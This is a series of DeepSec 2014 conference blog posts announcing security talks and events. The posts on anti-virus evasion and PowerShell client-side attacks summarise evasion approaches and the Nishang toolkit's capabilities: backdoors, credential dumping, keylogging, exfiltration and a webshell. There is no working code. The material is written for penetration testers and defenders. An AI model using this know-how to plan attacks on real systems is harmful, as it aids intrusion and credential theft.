DeepSec 2014 Talk: Why Anti-Virus Software fails

Filtering inbound and outbound data is most certainly a part of your information security infrastructure. A prominent component are anti-virus content filters. Your desktop clients probably have one. Your emails will be first read by these filters. While techniques like this have been around for a long time, they regularly draw criticism. According to some opinions the concept of anti-virus is dead. Nevertheless it’s still a major building block of security architecture. The choice can be hard, though. DeepSec 2014 features a talk by Daniel Sauder, giving you an idea why anti-virus software can  fail.

Someone who is starting to think about anti-virus evasion will see, that this can be reached easy (see for example last year’s DeepSec talk by Attila Marosi). If an attacker wants to hide a binary executable file with a Metasploit payload, the main points for accomplish this goal is mainly

  • encrypting/encoding the payload and have an own shellcode binder for escaping signature scanning, and
  • using a technique for evading the sandbox.

By developing further evasion techniques it is possible to research the internal functionality of anti-virus products. For example it can be determined whether a product is using x86 emulation or not, and what the emulation is capable of, and which Microsoft Windows API calls can disturb the anti-virus engine itself. Other tests include building an .exe file without a payload generated with msfpayload and well known attacking tools as well as 64-bit payloads and escaping techniques.

At the time of this writing Daniel Sauder developed 36 different techniques as proof of concept code and tested them against 8 different anti-virus products. More techniques and engines are pending. Together with documentation, papers, and talks from other researchers, this gives a deeper understanding for the functionality of anti-virus software and shows, where it is failing generally and in particular.

Anti-virus software is no magic solution that will always perfectly work. If you run filters of this kind, we recommend attending Daniel’s talk. Once you know how your defence mechanisms fail, you can work to improve them.

DeepSec 2014 Talk: Advanced Powershell Threat – Lethal Client Side Attacks

Modern environments feature a lot of platforms that can execute code by a variety of frameworks. There are UNIX® shells, lots of interpreted languages, macros of all kinds (Office applications or otherwise), and there is the Microsoft Windows PowerShell. Once you find a client, you usually will find a suitable scripting engine. This is very important for defending networks and – of course – attacking them. Nikhil Mittal will present ways to use the PowerShell in order to attack networks from the inside via the exploitation of clients.

PowerShell is the “official” shell and scripting language for Windows. It is installed by default on all post-Vista Windows systems and is found even on XP and Windows 2003 machines in an enterprise network. Built on the .NET framework, PowerShell allows interaction with almost everything one finds in a Windows machine and network. One could access system registry, Windows API, WMI, COM objects, .NET libraries, access other machines on network and so on. It is very useful for system administrators which make it an ideal tool/platform for penetration testers as well.

PowerShell has various distinct advantages over binaries and other non-Windows scripting languages. It is trusted by the operating system, the system administrators and antivirus. It is possible to perform various attacks using PowerShell without dropping anything to the disk. Add to this, the ability to natively interact with the machine and the network and you have a tool for penetration tests which is too good to be true!

There has been much interesting work on usage of PowerShell in penetration tests. The talk will introduce Nishang, which is a toolkit for usage of PowerShell in penetration tests. It has scripts divided under following heads:

  • Backdoors – Contains, DNS, HTTP and SSID backdoors.
  • Escalation – Escalate privileges, introduce vulnerabilities.
  • Execution – Execute code in memory using DNS TXT records, get authenticated shell access to a MSSQL Server.
  • Gather – Log keys, get credentials in plain, check for open ports on a target, dump SAM file, WLAN keys in secret, LSA Secrets.
  • Pivot – Execute PowerShell commands and scripts on other machines in network.
  • Scan – Port Scan and Brute Force
  • Utility – Add persistence, exfiltrate data, encode scripts.
  • Powerpreter – A script module with almost all functionality of Nishang in single script.
  • Antak – A webshell in ASP.NET which utilizes PowerShell.

One frequently asked question by users of Nishang is this: How PowerShell could be used for getting access to a network? Could it be used for getting a foothold in an enterprise network? Yes, of course, use client side attacks.

In this presentation it will be demonstrated that a client side attack with PowerShell is very effective as it exploits human ignorance and uses features of PowerShell – both inherent to any enterprise network. The attacks demonstrated would be phishing (user clicks on a link), malicious attachments (MS Word and Excel), malicious shortcuts (.LNK file), attacks using Java applets and Human Interface Devices (HIDs).

There have been many instances of PowerShell being used by malware writers for client side attacks. Some notable examples, a Russian ransomware, for infecting MS Office files, and malicious short-cuts.

The PowerShell scripts that will be presented in this talk draw inspiration from some of the above attacks.

This talk should be attended by those who do external penetration tests and would like to know more about using PowerShell for this purpose. System Administrators should also attend this talk to understand the latest tools used by the attackers.

For anyone intending to dive deeper into the powers of the PowerShell, we strongly recommend booking Nikhils training course, also held at DeepSec 2014.

DeepSec 2014 Talk: Trusting Your Cloud Provider – Protecting Private Virtual Machines

The „Cloud“ technology has been in the news recently. No matter if you use „The Cloud™“ or any other technology for outsourcing data, processes and computing, you probably don’t want to forget about trust issues. Scattering all your documents across the Internet doesn’t require a „Cloud“ provider (you only need to click on that email with the lottery winnings). Outsourcing any part of your information technology sadly requires a trust relationship. How do you solve this problem? Armin Simma of the Vorarlberg University of Applied Sciences has some ideas and will present them at DeepSec 2014.

Th presentation shows a combination of technologies on how to make clouds trustworthy. One of the top inhibitors for not moving (virtual machines) to the cloud is security. Cloud customers do not fully trust cloud providers. The problem with sending virtual machines to the cloud is that „traditional“ encryption is no solution because encrypted data (equal to code in our case) can not be executed. Taking a closer look at the numerous surveys about cloud adoption (and at inhibitors for not moving to the cloud) it can be seen that insider attacks are ranked in the top critical attacks. The insider in our scenario is the administrator (or a user with high/elevated privileges).

The key point is: the cloud customer is not trusting the administrator of the cloud provider’s system.

The solution to this problem is based on

  1. Trusted Computing technology and
  2. Mandatory Access Control.

Mandatory Access Control is used to prevent the administrator – who must be able to administer and thus access the host system – from accessing Virtual Machines running on top of the cloud provider’s system(s). Our system is able to log all activities of users. Users (including the administrator himself/herself) are not able to manipulate this log.

The former technology – Trusted Computing – is used as a mechanism for giving the cloud customer a proof that the system hosting his Virtual Machines (= the cloud provider’s infrastructure) was not manipulated. The proof is hardware-based: it prevents several kinds of attacks e.g. rootkits or other BIOS-manipulating attacks. The proof is based on measuring all systems (system parts) which were executed since boot time of the physical machine. Each part is measured before execution. This „measurement chain“ is called Trusted Boot. A standardised tamper-resistant hardware (the TPM) plus a standardized protocol allows for the proof to the customer. The proof is called attestation.

A second technology used for securing the cloud is Trusted Computing’s sealing mechanism. Sealing is an extension of asymmetric encryption: the decryption is done within the hardware (TPM) but only if the current measurement values are equal to predefined reference values. The reference values are defined by the cloud customer and specify a known good system plus system configuration . These techniques (Trusted Boot, Attestation, Sealing) allow the cloud customer to be sure that a specific (trustworthy) system is running on the provider’s site.

Armin’s talk is of interested to implementers and users of „Cloud“ infrastructure alike. In case you are playing with Trusted Computing, you should attend his talk as well.

DeepSec 2014 Talk: An innovative and comprehensive Framework for Social Vulnerability Assessment

Do you get a lot of email? Do customers and business partners send you documents? Do you talk to people on the phone? Then you might be interested in an assessment of your vulnerability by social interactions. We are proud to host a presentation by Enrico Frumento of CEFRIEL covering this topic.

As anyone probably knows nowadays spear-phishing is probably the most effective threat, and it is often used as a first step of most sophisticated attacks. Even recent JP Morgan Chase’s latest data breach seems to be originated by a single employee (just one was enough!) who was targeted by a contextualized mail. Into this new scenario it is hence of paramount importance to consider the human factor into companies’ risk analysis. However, is any company potentially vulnerable to these kind attacks? How is it possible to evaluate this risk through a specific vulnerability assessment?

These are the questions that we will try to address. Since 2010, when we presented our study about Cognitive Approach for Social Engineering at the DeepSec 2010 conference, we are working on the extension of traditional security assessment, going beyond the technology and including the „Social“ context. In these years we had the opportunity to work on this topic with several European big enterprises, allowing us to face the difficulties related to the impact of this kind of activities on the relational issues between employees and employer both from the ethical and legal points of view.

This experience allowed us to develop a specific methodology for performing Social Vulnerability Assessment (SVA), ensuring ethical respect for employees and legal compliance with European work regulations and standards. The legal constraints, which shape the limits of what these assessments can investigate, are quite cumbersome to understand, but we developed a good experience, especially into the Italian legal framework, which allows the execution of these studies. We now regularly perform Social Vulnerability Assessments into the enterprises as an integrated service.
Using our methodology during these years, we performed about 15 Social Vulnerability Assessments in big enterprises with thousands of employees (a gross number of 10.000 people): this gave us a relevant first-hand sight on the real vulnerability of the enterprises against modern non-conventional security threats.

In this talk, we will share our experience, describing how we conduct the Social Vulnerability Assessment, and will present an overview of the results collected so far. These results may actually help to understand which is the risk level related to spear-phishing attacks inside companies and some conclusions may be unexpected.

We highly recommend attending this presentation if you have to face advanced attacks against your organisation.

DeepSec 2014 Talk: Build Yourself a Risk Assessment Tool

All good defences start with some good ideas. The is also true for information security. DeepSec 2014 features a presentation by Vlado Luknar who will give you decent hints and a guideline on how to approach the dreaded risk assessment with readily available tools. We have kindly asked Vlado to give you a detailed teaser on what to expect:

It seems fairly obvious that every discussion about information security starts with a risk assessment. Otherwise, how do we know what needs to be protected, how much effort and resources we should put into preventing security incidents and potential business disasters? With limited time and budget at hand we’d better know very well where to look first and what matters the most.

If we look at some opinion-making bodies in information security, such as ISF, ISACA or (ISC)², and of course, at ISO/IEC standards (the 27000 series), we can see that in information security there is no escape from risk assessment. A difficult question for anyone responsible for managing information security is to decide when to rely on best practice or baseline security controls and when to apply risk assessment and in what detail.

Risk assessment in information security is, at least in theory, quite self-evident. We have to

  • look at business objectives,
  • identify assets these objectives are built upon,
  • identify the core underlying systems that represent the assets,
  • estimate the potential impact (I) on these assets if something goes wrong (a threat materializes), and
  • identify threats to these assets by looking at related vulnerabilities and countermeasures eliminating them (probability – P).

In the end, we arrive at our risk R by calculating impact times probability (I×P), almost certainly identifying some actions to perform (i.e. measures to mitigate the risk, either its impact or probability).

Well, that’s the easy part. Now, we are supposed to repeat this risk assessment- either as soon as any of these variables changes (objective, asset, system, threat, vulnerability, control) or at least once per agreed-on period of time.

In general, existing security compliance frameworks (e.g. ISO/IEC 27001, COBIT, PCI DSS) do not dictate any specific risk assessment methodologies or tools. The common agreement seems to be: stick to the scheme of asset-threat-vulnerability-control and use whatever suits you to objectively reduce risks  – anything that allows you to be consistent, reproducible and measurable.

And this is the moment you start looking for a risk assessment tool, be it a commercial or an open-source one. In fact, your security team may be small and you may have no risk assessment specialist in there. Yet, you need to be structured about your security risk decisions in a easy-to-do and efficient manner every time you run an assessment hoping that if you don’t catch something important in this run, you will succeed in the next iteration, or an incident will teach you about it the hard way.

How many risk assessment methodologies for information security can we find on Internet today? If you filter out government- and consultancy-related methodologies (mostly without a tangible product you could buy) you end up with a list of 15-20 different methodologies with some of them comprising also a risk assessment tool. This might seem like a lot but only until you try to implement one of them in your organization.

You start with the first one and realize it needs weeks of training because its learning curve is so steep, the other uses awkward terminology, the next one has some strange threat categories mixing apples with oranges or uses just plain old references (talking about Windows 95,  fax machines and dial-up connections) and another one requires you to take a series of complicated installation and configuration steps (plus requiring a highly privileged account on your desktop). And yet another group of tools, instead of risk assessment, talks about scanning and vulnerability management.

In fact, if you are a security manager in a small to medium size company where every security topic passes through your hands, you might be better off by using your own tool because building it is not a rocket science and does not take that much time. You develop its features on the go and by doing it you capture all the internal knowledge that otherwise might be lost.

Over the years of being a security practitioner in a commercial organization I have learned few things.

  • The quest for a perfect ready-made tool is useless, because it is you and your team who add the most value in the process (the tool will not have the “knowledge” on its own).
  • In case you think you did find a perfect product built by someone else, think again: are you sure it is you – not the tool – who discovers risks?
  • Simple things work the best: the more complicated the tool, the less focused you stay on the subject-matter (i.e. the risks); not everything needs to be assessed thoroughly at the same time and at the same level of detail; not everything needs to be automated and re-calculated in real-time.
  • The tool should be pre-defined and structured only to some extent, not limiting your creativity and knowledge of the context (translated as your “internal expertise”).
  • Tools come and go and you may get stuck with a quite expensive product nobody supports any more and your own knowledge recorded in there may not be easily accessible.
  • When you hit the proper balance between a pre-defined, mandatory check-list and creativity, you’ll be focusing only on those things that are important the most, those that – in a given context – make or break the security of your product or service.

The presentation is not about latest advances in information security risk assessment. It will describe the process of making a practical, wiki-based tool, starting with publicly available resources: threats, vulnerabilities and controls (mostly from ISO/IEC 2700X) that are merged into a light ecosystem that is configured, improved and used only via a web browser. Such an ecosystem, actually an Information Security Management System called RISSCON, is used daily in a real company (Orange Slovensko a.s.) to keep up with the requirements of ISO/IEC 27001.

Tags: , , ,
Posted in Conference by . No Comments

DeepSec 2014 Talk: MLD Considered Harmful – Breaking Another IPv6 Subprotocol

In case you haven’t noticed, the Internet is getting crowded. Next to having billions of people online, their devices are starting to follow. Information security experts can’t wait to see this happen. The future relies on the Internet Protocol Version 6 (IPv6). IPv6 features a lot of improvements over IPv4. Since you cannot get complex stuff right at the first time, IPv6 brings some security implications with it. Past and present conferences have talked about this. DeepSec 2014 is no exception. Enno Rey of ERNW will talk about Multicast Listener Discovery (MLD) in his presentation.

The presentation is the first time that the results of an ongoing research of MLD are published. MLD is a protocol belonging to the IPv6 family, and sadly it features insecurities. MLD (Multicast Listener Discovery), and its successor, MLDv2, are used by IPv6 routers for discovering multicast listeners on a directly attached link, much like the Internet Group Management Protocol (IGMP) is used in IPv4. Even if you haven’t realised it yet, MLD is already everywhere. Many multicast applications, when the underlying layer-3 protocol is IPv6, base their operation on MLD, while most of the modern Operating Systems (OS), like Windows, Linux and FreeBSD, not only come pre-configured with IPv6 enabled, but they also start-up by sending MLD traffic, which is repeated periodically. Despite of the out-of-the-box usage of MLD, it is one of the IPv6 protocols that have not be studied yet to a suitable extend, especially as far as its potential security implications are concerned. As it will be shown, these can vary from OS fingerprinting on the local-link by sniffing the wire passively, to amplified Denial of Service attacks.

Specifically, in this talk, after presenting the results of the analysis of the default behaviour of some of the most popular OS, we will examine, by using specialised tools, whether the specific OS implementations conform to the security measures defined by the corresponding RFCs, and if not, what are the potential security implications. Then, by diving into the specifications of the protocol, we will discuss potential security issues related with the design of MLD and how they can be exploited by attackers. Finally, specific security mitigation techniques will be proposed to defend against them, which will allow us to secure IPv6 networks to the best possible extend in the emerging IPv6 era.

Let’s make the IPv6 world a safer place! ☻

For anyone dealing with IPv6, DeepSec 2014 also offers a two day training IPv6 Attacks and Defenses – A Hands-on Workshop, held by Enno himself.

Internet service providers already rolled out IPv6, especially for hosted or co-located environments. Furthermore IPv6 connectivity is widely available by means of tunnels (Teredo for example). This is why we recommend Enno’s talk and training for anyone using networks (Internet connection is optional since most operating systems use IPv6 locally any way). Deal with your network before attackers do!

DeepSec 2014 Keynote: The Measured CSO

It’s good if your organisation has someone to take on information security. However it’s bad if you are the person in this position. Few are lucky enough to actually deal with improving information security. And some are caught in compliance fighting an uphill struggle against regulations and audits that have nothing to do with the threats to your business.

The management of Information Security has become over-regulated and to some degree, over-focused on compliance to policy/regulation, architectural decisions, network access, and vulnerability management. As a result, many CISOs struggle to define success in terms that match the goals of their business, and struggle to make their risk management efforts relevant to senior executives.

How do you achieve that? Alex Hutton will tell you in his keynote talk at DeepSec 2014. His goal is for attendees to walk away after the talk with two things.  First, a technique they can take back to their jobs with them that will help them make the concept of “aligning security with the business” less of a platitude and more of a reality.  Second, we will discuss a new, threat-centric framework that uses metrics to understand how security operations reduces risk.

Curious? Cursed with being a CSO? Dreaming to become one someday? Having nightmares about metrics? Well, then you should probably avoid missing Alex’ keynote!

Tags: ,
Posted in Conference by . No Comments

EuroTrashSecurity Podcast – Microtrash37 : DeepSec 2014 Content

Microtrash37 of the EuroTrashSecurity podcast is out! We had a little talk with Chris about the schedule of DeepSec 2014 and what to expect. It’s a teaser for the blog articles about the talks and the trainings to come. We will describe more details on the blog, but you get a good overview what to expect from the audio.

We also got some inside information on the upcoming BSidesVienna 0x7DE. We will definitely attend and so should you! The BSidesVienna has some cool surprises for you. Don’t miss out on the chance to get together. The Call for Papers is still open! If you have something to share, please consider submitting a talk.

BSidesVienna 2014 – Call for Papers still open

BSidesVienna is back! And the organisation team is looking for talks.

BSidesVienna was started in 2011. There were some smaller BSides-like events in Vienna in the past two years. BSidesVienna 2014 is planned for the 22 November 2014 (right after DeepSec 2014). The call for papers will close on 30 September 2014, so if you have interesting stuff you want to show onstage, then submit it to the BSidesVienna team.

You can’t keep a good con down… so let’s have fun and infosec talks at BSidesVienna 2014!

Preliminary Schedule of DeepSec 2014 published

After weeks of hard work we have now the preliminary schedule of DeepSec 2014 online! We received over hundred submissions, and we had to navigate through a lot of publications, abstracts and references. We hope that you like the mixture of topics. We especially hope that you will find the offered trainings interesting.

We still wait for content and corrections, so bear with us while the schedule takes its final form. Contrary to the past years we had a lot more to do in terms of completing information about submitted talks and trainings. We will tell you more about this in the upcoming blog articles (which we will announce on our Twitter account, so you don’t miss anything).

Looking forward to see you in Vienna in November!

Reviewing all your Submissions for DeepSec 2014

The Call for Papers of DeepSec 2014 officially ended yesterday. We are currently reviewing all your submissions and will publish the preliminary schedule in the course of the next two weeks. As always, you did a very good job of finding things to break and to exploit. Our choice what to include in the schedule will be pretty hard!

For those who still have bright ideas and no time to submit, please send us your abstracts as soon as possible! We will consider everything submitted so far first, but we will take your proposals into account. You just need to tell us.

Reminder: Call for Papers DeepSec 2014

The Call for Papers of DeepSec 2014 is still open. Since its motto is the power of knowledge we address everyone having knowledge. Information is the „cyber“ weapon of the 21rst century, we have heard. So if you know about the 0day that affects half the Internet, you should definitely think about presenting it at DeepSec 2014. ☻

Seriously, we have chosen this motto, because a lot of issues in information security deal with knowledge. If your IT staff knows about the latest threats, the capabilities of the defences, the state of the systems, and how to deal with problems, then you have a distinct advantage. Not knowing is usually the first step of running into problems. In this tradition we prefer disclosure of security-related knowledge. The dreaded CVE-2014-0160 is a good example. Imagine OpenSSL deployments still had the Heartbleed bug (which some of them still do, sadly) and no one knew about this. Ignorance isn’t always bliss. Disclosing this information will eventually render offensive tools ineffective. This was discussed by fx in his keynote for DeepSec 2012.

The submissions we received so far look very promising. Can you think of ways how knowledge can affect information  security for better or worse? We bet you can, so let us know.

Ticket Registration is open

The ticket registration for DeepSec 2014 „The Octave“ is open. You can either use the embedded version on the DeepSec web site or go directly to the ticketing site. The tickets are now available for the early bird tariff. Make sure you get your tickets as soon as possible. The later tariffs are more expensive.

The current Call for Papers for DeepSec 2014 (and DeepINTEL 2015) is open, and we are looking for talks applying the power of knowledge to information security. Would you like to know more?

New Use Cases for Bitcoin

Although I’m new in the Bitcoin world I had a quite promising start. Earlier this month I was able to visit the Bitcoin Conference in Amsterdam and had some very good conversations with core developers from the Bitcoin Foundation and to my honor also the chance to talk to Gavin Andreesen, long-time lead developer and now chief scientist of the Bitcoin Foundation.

At DeepSec our first contact with Bitcoin was in 2012 when John Matonis, now Executive Director and Board Member of the Bitcoin Foundation, talked about the evolution of e-Money.  But since then we hadn’t intense contact.

Tomorrow I will visit the Bitcoin Expo in Vienna and hope to meet new people in the community and discuss the latest trends and developments.

The fascinating thing about Bitcoin and the global block-chain is the cryptographic background and the decentralized consensus algorithm. This distributed algorithm is used today primarily to “sign” transactions of Bitcoins but also gives the opportunity to “deposit” text messages which are so to say “notarized” in a distributed, decentralized way.

New Use Cases for the Block-Chain

Ethereum for example borrows the decentralized consesus of bitcoin and adds a “turing-complete” programming language to the blockchain in form of the so-called EVM or Ethereum Virtual Machine. In Ethereum Messages -or Transactions- can contain code, the so-called contract. The code in the contract can be used to control financial or semi-financial applications which will control transactions of e-money but it can also be used for non-financial applications like e-voting, decentralized e-government and possibly security applications.

Rivetz is suggesting to build a bridge between trusted computing and and the decentralized digital transactions of the Bitcoin world. Steven Sprague, CEO,  gave me a quick introduction to some of the ideas, for example a TPM module could push security-fingerprints of a system into the block-chain and access them later to check for inconsistencies or modifications. He called this application the “digital birth certificate” of a machine.

Standards will be appreciated

Although the Bitcoin community doesn’t completely agree there is quite a large interest in an open standard, possibly even an IETF RFC, describing the bitcoin protocol family. Currently Bitcoin is published as a reference code on github without a full formal description of the protocol and interactions. The standardization is focused on the usage of the API of this reference code.

Many stakeholders like Bitcoin Exchanges, vendors of Bitcoin-Miners and third-party software-vendors who interact with the Bitcoin would like to see a formal open standard in addition to the reference code to facilitate new applications like described above.

Maybe next year or when Bitcoin reaches version 1.0 we will have the first drafts available.

I’m curious about the Bitcoin Expo tomorrow and I will post an update soon.

Links:
Tags:
Posted in Security Stories by . 1 Comment

IT Security without Borders

U.S. government officials are considering to prevent Chinese nationals from attending hacking and IT security conferences by denying visas. The ideas is „to curb Chinese cyber espionage“. While this initiative has been widely criticised and the measure is very easy to circumvent, it doesn’t come as a surprise. Recent years have shown that hacking has become more and more political. This aspect was already explored in the keynote of DeepSec 2012. So what is the real problem?

Espionage, be it „cyber“ or not, revolves around information. This is exactly why we have a problem with the word „cyber“. Methods of transporting information have been around for a long time. Guglielmo Marconi and Heinrich Hertz raised problems for information security long before the Internet did. The only difference is the ease of setting up Internet connectivity compared to wireless transmissions (if you discount Wi-Fi networks). Technology crosses borders ever since the first wireless transmission. Networked drones, the Internet of Things, and other developments are just the extension of technological concepts. Moreover the concept of IT security is a team effort. No country, no business, no organisation, and no hacker group by itself can implement a „fail-safe“ security concept. Being part of the Internet means to be connected to the weakest link, like it or not. End points with full-disk encryption and the latest VPN setup compromised by malicious software are the perfect example. If firewalls can’t do perimeter protection on their own, so do blocked visa requests.

DeepSec has maintained its neutral stance throughout the years. IT security needs places where every group can talk freely to other groups (or individuals). DeepSec still is the conference to go where security professionals from academics, government, industry, and the (underground) hacking community can have a chat. The Call for Papers titled „The Power of Knowledge“ stresses this. If you have content illustrating the role of cooperation in IT security, then we are very keen to hear from you!